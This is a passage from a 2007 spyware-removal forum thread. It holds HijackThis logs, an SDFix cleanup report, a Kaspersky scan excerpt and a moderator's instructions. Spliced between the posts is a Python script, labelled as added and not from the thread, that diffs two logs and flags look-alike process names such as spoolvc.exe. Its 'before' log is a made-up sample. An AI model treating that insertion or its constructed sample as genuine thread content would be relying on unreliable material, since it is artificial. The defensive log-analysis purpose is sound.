O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {481E7983-1F2B-4250-951A-44E0902DF978} - (no file)
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: (no name) - {68D5CF1D-EC5C-4bdd-A9EF-F0E517565D50} - (no file)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: (no name) - {F2496031-4FE4-497E-8F75-04E0A180366E} - C:\WINDOWS\System32\vtsqn.dll (file missing)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: DAP Bar - {62999427-33FC-4baf-9C9C-BCE6BD127F08} - D:\Program Files\DAP\DAPIEBar.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [SMSERIAL] sm56hlpr.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [DSLSTATEXE] "C:\Program Files\GlobespanVirata\Adsl\dslstat.exe" icon
O4 - HKLM\..\Run: [DSLAGENTEXE] "C:\Program Files\GlobespanVirata\Adsl\dslagent.exe"
O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [MailScan Dispatcher] "C:\Program Files\eScan\LAUNCH.EXE"
O4 - HKLM\..\Run: [eScan Updater] "C:\PROGRA~1\eScan\TRAYICOS.EXE" /App
O4 - HKLM\..\Run: [eScan Monitor] C:\PROGRA~1\eScan\AVPMWrap.EXE
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [swg] "C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe"
O4 - HKCU\..\Run: [Skype] "D:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [SUPERAntiSpyware] "D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe"
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Samsung Multimedia Keyboard.lnk = ?
O8 - Extra context menu item: &Download with &DAP - D:\PROGRA~1\DAP\dapextie.htm
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Advanced Email Extractor - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html
O8 - Extra context menu item: Download &all with DAP - D:\PROGRA~1\DAP\dapextie2.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://D:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Scan link with AEE - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/link.html
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Run DAP - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - D:\PROGRA~1\DAP\DAP.EXE
O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O9 - Extra 'Tools' menuitem: Advanced Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O17 - HKLM\System\CCS\Services\Tcpip\..\{17BBF687-1141-4522-B007-EF63C7F4B7EE}: NameServer = 202.54.6.60,202.54.29.5
O17 - HKLM\System\CCS\Services\Tcpip\..\{7A1DA16E-B943-4E3A-A5A8-FF298FFD2041}: NameServer = 202.54.29.5 202.54.6.60
O20 - Winlogon Notify: !SASWinLogon - D:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O20 - Winlogon Notify: WRNotifier - C:\WINDOWS\SYSTEM32\WRLogonNTF.dll
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: eScan Server-Updater (eScan-trayicos) - MicroWorld Technologies Inc. - C:\PROGRA~1\eScan\TRAYSSER.EXE
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: eScan Monitor Service (KAVMonitorService) - Kaspersky Labs. - C:\PROGRA~1\eScan\avpm.exe
O23 - Service: MWAgent - MicroWorld Technologies Inc. - C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
O23 - Service: Webroot Spy Sweeper Engine (WebrootSpySweeperService) - Webroot Software, Inc. - C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
|
|
|
Feb 11 2007, 07:00 AM, Post #14
Member (Group: Members, Posts: 16, Joined: 4-February 07, Member No.: 10,964)
Thanks Rridgely, below are the reports. Please advise the next step:
1) SDFix report:

SDFix: Version 1.64
Run by: Sys - Sun 02/11/2007 @ 12:19:12.87
Microsoft Windows XP [Version 5.1.2600]
Running From: C:\SDFix

Safe Mode:
Checking Services:

Name:
Path:

Restoring Windows Registry Entries
Restoring Default Hosts File

Rebooting...

Normal Mode:
Checking Files:

Below files will be copied to Backups folder then removed:

C:\WINDOWS\system32\eraseme_38347.exe - Deleted
C:\WINDOWS\system32\eraseme_46035.exe - Deleted
C:\WINDOWS\system32\eraseme_51380.exe - Deleted
C:\WINDOWS\system32\i - Deleted
C:\WINDOWS\system32\plscd.exe - Deleted
C:\WINDOWS\system32\setup_23367.exe - Deleted

ADS Check:

C:\WINDOWS\system32
No streams found.

Final Check:

Remaining Files:
---------------

Backups Folder: - C:\SDFix\backups\backups.zip

Checking For Files with Hidden Attributes :

C:\WINDOWS\system32\FC5303FB6F.sys
C:\WINDOWS\system32\KGyGaAvL.sys
C:\WINDOWS\LastGood.Tmp\INF\oem5.inf
C:\WINDOWS\LastGood.Tmp\INF\oem5.PNF

Finished

2) New HijackThis log:

Logfile of HijackThis v1.99.1
Scan saved at 12:27:02 PM, on 2/11/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\eScan\TRAYSSER.EXE
C:\PROGRA~1\eScan\avpm.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWAgent.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\sm56hlpr.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\GlobespanVirata\Adsl\dslstat.exe
C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\PROGRA~1\eScan\TRAYICOS.EXE
C:\PROGRA~1\eScan\AVPMWrap.EXE
C:\PROGRA~1\eScan\MAILDISP.EXE
C:\PROGRA~1\ESCAN\SPOOLER.EXE
C:\PROGRA~1\eScan\MAILSCAN.EXE
C:\PROGRA~1\eScan\kavss.exe
D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\PROGRA~1\eScan\AvpM.exe
C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
D:\Program Files\Skype\Phone\Skype.exe
D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
C:\HIJACKTHIS\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.co.in/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.com/search?q=%s
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = iexplore
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O2 - BHO: DAPHelper Class - {0000CC75-ACF3-4cac-A0A9-DD3868E06852} - D:\Program Files\DAP\DAPBHO.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {481E7983-1F2B-4250-951A-44E0902DF978} - (no file)
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: (no name) - {68D5CF1D-EC5C-4bdd-A9EF-F0E517565D50} - (no file)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: (no name) - {F2496031-4FE4-497E-8F75-04E0A180366E} - C:\WINDOWS\System32\vtsqn.dll (file missing)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: DAP Bar - {62999427-33FC-4baf-9C9C-BCE6BD127F08} - D:\Program Files\DAP\DAPIEBar.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [SMSERIAL] sm56hlpr.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [DSLSTATEXE] "C:\Program Files\GlobespanVirata\Adsl\dslstat.exe" icon
O4 - HKLM\..\Run: [DSLAGENTEXE] "C:\Program Files\GlobespanVirata\Adsl\dslagent.exe"
O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [MailScan Dispatcher] "C:\Program Files\eScan\LAUNCH.EXE"
O4 - HKLM\..\Run: [eScan Updater] "C:\PROGRA~1\eScan\TRAYICOS.EXE" /App
O4 - HKLM\..\Run: [eScan Monitor] C:\PROGRA~1\eScan\AVPMWrap.EXE
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [swg] "C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe"
O4 - HKCU\..\Run: [Skype] "D:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [SUPERAntiSpyware] "D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe"
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Samsung Multimedia Keyboard.lnk = ?
O8 - Extra context menu item: &Download with &DAP - D:\PROGRA~1\DAP\dapextie.htm
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Advanced Email Extractor - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html
O8 - Extra context menu item: Download &all with DAP - D:\PROGRA~1\DAP\dapextie2.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://D:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Scan link with AEE - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/link.html
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Run DAP - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - D:\PROGRA~1\DAP\DAP.EXE
O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O9 - Extra 'Tools' menuitem: Advanced Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O17 - HKLM\System\CCS\Services\Tcpip\..\{17BBF687-1141-4522-B007-EF63C7F4B7EE}: NameServer = 202.54.6.60,202.54.29.5
O17 - HKLM\System\CCS\Services\Tcpip\..\{7A1DA16E-B943-4E3A-A5A8-FF298FFD2041}: NameServer = 202.54.29.5 202.54.6.60
O20 - Winlogon Notify: !SASWinLogon - D:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O20 - Winlogon Notify: WRNotifier - C:\WINDOWS\SYSTEM32\WRLogonNTF.dll
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: eScan Server-Updater (eScan-trayicos) - MicroWorld Technologies Inc. - C:\PROGRA~1\eScan\TRAYSSER.EXE
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: eScan Monitor Service (KAVMonitorService) - Kaspersky Labs. - C:\PROGRA~1\eScan\avpm.exe
O23 - Service: MWAgent - MicroWorld Technologies Inc. - C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
O23 - Service: Webroot Spy Sweeper Engine (WebrootSpySweeperService) - Webroot Software, Inc. - C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
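The helpers in this thread compare the successive HijackThis logs by eye to see what SDFix removed and what is still there. The Python below is an added example (not from the thread and not part of HijackThis) that does that comparison mechanically: it parses the "Running processes" list and the R/O entries of a log, diffs two logs, and flags process names that are near-misses of core Windows binaries (spoolvc.exe for spoolsv.exe, svcchost.exe for svchost.exe), the naming trick bots of this kind use to hide in a process list. The "before" log is a constructed sample modelled on an infected XP process list; the "after" lines are a trimmed copy of the 11 Feb log above. The list of system binary names and the 0.85 similarity threshold are assumptions for the demonstration, not HijackThis rules.

```python
import re
from difflib import SequenceMatcher

# Core Windows XP binaries whose names malware likes to imitate.
# Assumption: a short hand-picked list, enough for this demonstration.
SYSTEM_NAMES = {
    "smss.exe", "winlogon.exe", "services.exe", "lsass.exe",
    "svchost.exe", "spoolsv.exe", "explorer.exe", "ctfmon.exe",
}

# Constructed sample "before" log: a made-up infected XP process list with two
# look-alike names (spoolvc.exe, svcchost.exe) sitting next to the real binaries.
LOG_BEFORE = r"""
Logfile of HijackThis v1.99.1
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\spoolvc.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svcchost.exe
C:\WINDOWS\Explorer.EXE

O2 - BHO: (no name) - {F2496031-4FE4-497E-8F75-04E0A180366E} - C:\WINDOWS\System32\vtsqn.dll (file missing)
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
"""

# Trimmed copy of the 11 Feb log posted above: the look-alikes are gone, an
# anti-spyware guard is running, and a Winlogon Notify entry is present.
LOG_AFTER = r"""
Logfile of HijackThis v1.99.1
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
D:\Program Files\AVG Anti-Spyware 7.5\guard.exe

O2 - BHO: (no name) - {F2496031-4FE4-497E-8F75-04E0A180366E} - C:\WINDOWS\System32\vtsqn.dll (file missing)
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O20 - Winlogon Notify: WRNotifier - C:\WINDOWS\SYSTEM32\WRLogonNTF.dll
"""

ENTRY_RE = re.compile(r"^[RFNO]\d+ - ")  # R0/R1/F1/N1/O2... entry prefix


def parse_hjt(text):
    """Split a HijackThis log into (process paths, Rx/Ox entry lines)."""
    procs, entries, in_procs = [], [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Running processes:"):
            in_procs = True
            continue
        if ENTRY_RE.match(line):
            in_procs = False        # the first entry ends the process list
            entries.append(line)
        elif in_procs:
            procs.append(line)
    return procs, entries


def _delta(old, new):
    """Case-insensitive set difference, returning (gone, added) in sorted order."""
    o = {x.lower(): x for x in old}
    n = {x.lower(): x for x in new}
    return (sorted(o[k] for k in o.keys() - n.keys()),
            sorted(n[k] for k in n.keys() - o.keys()))


def diff_logs(before, after):
    """What disappeared and what appeared between two logs."""
    pb, eb = parse_hjt(before)
    pa, ea = parse_hjt(after)
    procs_gone, procs_new = _delta(pb, pa)
    entries_gone, entries_new = _delta(eb, ea)
    return {"procs_gone": procs_gone, "procs_new": procs_new,
            "entries_gone": entries_gone, "entries_new": entries_new}


def lookalike(basename, threshold=0.85):
    """Return the system binary a name imitates (spoolvc.exe -> spoolsv.exe), or None."""
    name = basename.lower()
    if name in SYSTEM_NAMES:
        return None
    best = max(SYSTEM_NAMES, key=lambda s: SequenceMatcher(None, name, s).ratio())
    return best if SequenceMatcher(None, name, best).ratio() >= threshold else None


def suspicious_processes(text):
    """(path, imitated system binary) for every look-alike in the process list."""
    procs, _ = parse_hjt(text)
    hits = []
    for path in procs:
        imitated = lookalike(path.rsplit("\\", 1)[-1])
        if imitated:
            hits.append((path, imitated))
    return hits


def flag_entries(text):
    """Entries that point at a missing file or an unrecognised Winsock LSP."""
    _, entries = parse_hjt(text)
    return [e for e in entries
            if "(file missing)" in e or "Unknown file in Winsock LSP" in e]


if __name__ == "__main__":
    for key, items in diff_logs(LOG_BEFORE, LOG_AFTER).items():
        print(key, items)
    print(suspicious_processes(LOG_BEFORE))
    print(flag_entries(LOG_AFTER))
```

The diff is case-insensitive because HijackThis reports paths exactly as the registry or process list spells them (System32 vs system32), so a case-sensitive comparison would report spurious changes. The look-alike check uses a plain similarity ratio rather than a fixed typo list, so it also catches variants such as an extra letter or a swapped pair that a hand-written list would miss; lower the threshold only with care, since legitimate vendor binaries can sit close to a system name.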
Feb 11 2007, 04:52 PM, Post #15
I hate computers (Group: Moderators, Posts: 8,645, Joined: 12-April 05, Member No.: 1,352)
Next please visit the SpyKillers forum here:
http://www.thespykiller.co.uk/forum/index.php?board=1.0

Read the instructions for uploading files, which are the first topic on the forum, then start a new topic named 'Files From CCleaners Forum'. Please then post a link to this thread and upload the SDFix backups folder, which is located here: C:\SDFix\backups\backups.zip

Once they are uploaded you can delete the C:\SDFix folder to remove the infected backups from your system.

---------

Run Kaspersky WebScanner
--------------------
Having problems with spyware and viruses? If so then please follow the Spyware Removal Guide.
Want to know how to protect your clean computer from viruses and spyware? Then please follow the Malware Prevention Guide.
Looking for good free security software (or other great free stuff)? Then please take a look at the Recommended Security Applications Guide.
Feb 12 2007, 12:43 PM, Post #16
Member (Group: Members, Posts: 16, Joined: 4-February 07, Member No.: 10,964)
Thanks Rridgely, below are the reports.
Please study them and revert to me with the next step.

1) Link for the SDFix upload file: http://www.thespykiller.co.uk/forum/index....mp;topic=3599.0

2) KAVSCAN.TXT file:

-------------------------------------------------------------------------------
KASPERSKY ONLINE SCANNER REPORT
Monday, February 12, 2007 5:54:43 PM
Operating System: Microsoft Windows XP Professional, Service Pack 2 (Build 2600)
Kaspersky Online Scanner version: 5.0.83.0
Kaspersky Anti-Virus database last update: 12/02/2007
Kaspersky Anti-Virus database records: 267015
-------------------------------------------------------------------------------

Scan Settings:
Scan using the following antivirus database: extended
Scan Archives: true
Scan Mail Bases: true

Scan Target - My Computer:
A:\
C:\
D:\
E:\
F:\
G:\

Scan Statistics:
Total number of scanned objects: 71641
Number of viruses found: 7
Number of infected objects: 34 / 0
Number of suspicious objects: 0
Duration of the scan process: 00:34:49

Infected Object Name / Virus Name / Last Action
C:\Documents and Settings\LocalService\Cookies\index.dat Object is locked skipped
C:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat Object is locked skipped
C:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG Object is locked skipped
C:\Documents and Settings\LocalService\Local Settings\History\History.IE5\index.dat Object is locked skipped
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat Object is locked skipped
C:\Documents and Settings\LocalService\NTUSER.DAT Object is locked skipped
C:\Documents and Settings\LocalService\ntuser.dat.LOG Object is locked skipped
C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat Object is locked skipped
C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG Object is locked skipped
C:\Documents and Settings\NetworkService\NTUSER.DAT Object is locked skipped
C:\Documents and Settings\NetworkService\ntuser.dat.LOG Object is locked skipped
C:\Documents and Settings\Sys\Application Data\SUPERAntiSpyware.com\SUPERAntiSpyware\SUPERANTISPYWARE.LOG Object is locked skipped
C:\Documents and Settings\Sys\Cookies\index.dat Object is locked skipped
C:\Documents and Settings\Sys\Desktop\BMK\SmitfraudFix\SmitfraudFix.exe/data.rar/SmitfraudFix/Reboot.exe Infected: not-a-virus:RiskTool.Win32.Reboot.f skipped
C:\Documents and Settings\Sys\Desktop\BMK\SmitfraudFix\SmitfraudFix.exe/data.rar Infected: not-a-virus:RiskTool.Win32.Reboot.f skipped
C:\Documents and Settings\Sys\Desktop\BMK\SmitfraudFix\SmitfraudFix.exe RarSFX: infected - 2 skipped
C:\Documents and Settings\Sys\Desktop\BMK\SmitfraudFix\SmitfraudFix.exe PE_Patch.UPX: infected - 2 skipped
